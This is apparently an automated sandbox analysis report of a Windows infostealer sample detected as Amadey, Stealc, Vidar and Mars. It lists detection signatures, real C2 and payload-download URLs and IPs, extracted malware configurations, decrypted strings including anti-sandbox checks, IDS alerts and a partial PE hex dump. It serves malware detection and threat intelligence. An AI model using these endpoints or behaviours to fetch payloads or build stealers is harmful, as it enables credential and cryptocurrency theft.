Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
Analysis ID: 1465915
MD5: ebe33b40ce854edd8e39259a1b980a65
SHA1: db07d27d6ee753c4b0f60ee50c0e052a12095ca3
SHA256: 99e1c640be9fa28cee9b185982a47bbbefe8a699b79a22bfbb97c097fb0aec31
Tags: exe
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpFBF Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll= Avira URL Cloud: Label: malware
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll2 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php4 Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/a Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/rBJ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeData Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exea Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exem Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpnB~ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllS Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe50673b5d7X Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 11.2.a37ec701f3.exe.120000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.8040.8.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://77.91.77.82/Hun4Ko/index.phpQ Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/ Virustotal: Detection: 17% Perma Link
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpV Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php4 Virustotal: Detection: 21% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Virustotal: Detection: 22% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php4 Virustotal: Detection: 13% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://77.91.77.82/ Virustotal: Detection: 23% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php Virustotal: Detection: 23% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe ReversingLabs: Detection: 44%
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Virustotal: Detection: 44% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetProcAddress
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: LoadLibraryA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: lstrcatA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: OpenEventA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: CreateEventA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: CloseHandle
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: Sleep
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetUserDefaultLangID
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: VirtualAllocExNuma
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: VirtualFree
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetSystemInfo
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: VirtualAlloc
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: HeapAlloc
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetComputerNameA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: lstrcpyA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetProcessHeap
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetCurrentProcess
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: lstrlenA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: ExitProcess
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetSystemTime
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: SystemTimeToFileTime
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: advapi32.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: gdi32.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: user32.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: crypt32.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: ntdll.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetUserNameA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: CreateDCA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetDeviceCaps
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: ReleaseDC
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: CryptStringToBinaryA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: sscanf
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: VMwareVMware
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: HAL9TH
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: JohnDoe
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: DISPLAY
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: %hu/%hu/%hu
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: http://85.28.47.4
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: /920475a59bac849d.php
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: /69934896f997d5bb/
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: jony
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetFileAttributesA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GlobalLock
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: HeapFree
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetFileSize
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GlobalSize
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: IsWow64Process
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: Process32Next
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetLocalTime
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: FreeLibrary
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetTimeZoneInformation
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetSystemPowerStatus
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetVolumeInformationA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: Process32First
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetLocaleInfoA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetModuleFileNameA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: DeleteFileA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: FindNextFileA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: LocalFree
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: FindClose
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: LocalAlloc
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetFileSizeEx
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: ReadFile
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: SetFilePointer
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: WriteFile
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: CreateFileA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: FindFirstFileA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: CopyFileA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: VirtualProtect
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetLastError
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: lstrcpynA
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: MultiByteToWideChar
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GlobalFree
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: WideCharToMultiByte
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GlobalAlloc
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: OpenProcess
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: TerminateProcess
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: GetCurrentProcessId
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: gdiplus.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: ole32.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: bcrypt.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: wininet.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: shlwapi.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: shell32.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: psapi.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: rstrtmgr.dll
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: SelectObject
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: BitBlt
Source: 11.2.a37ec701f3.exe.120000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C4D6C80
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:63880 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:63880 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.4:63880
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:63880 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.4:63880
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
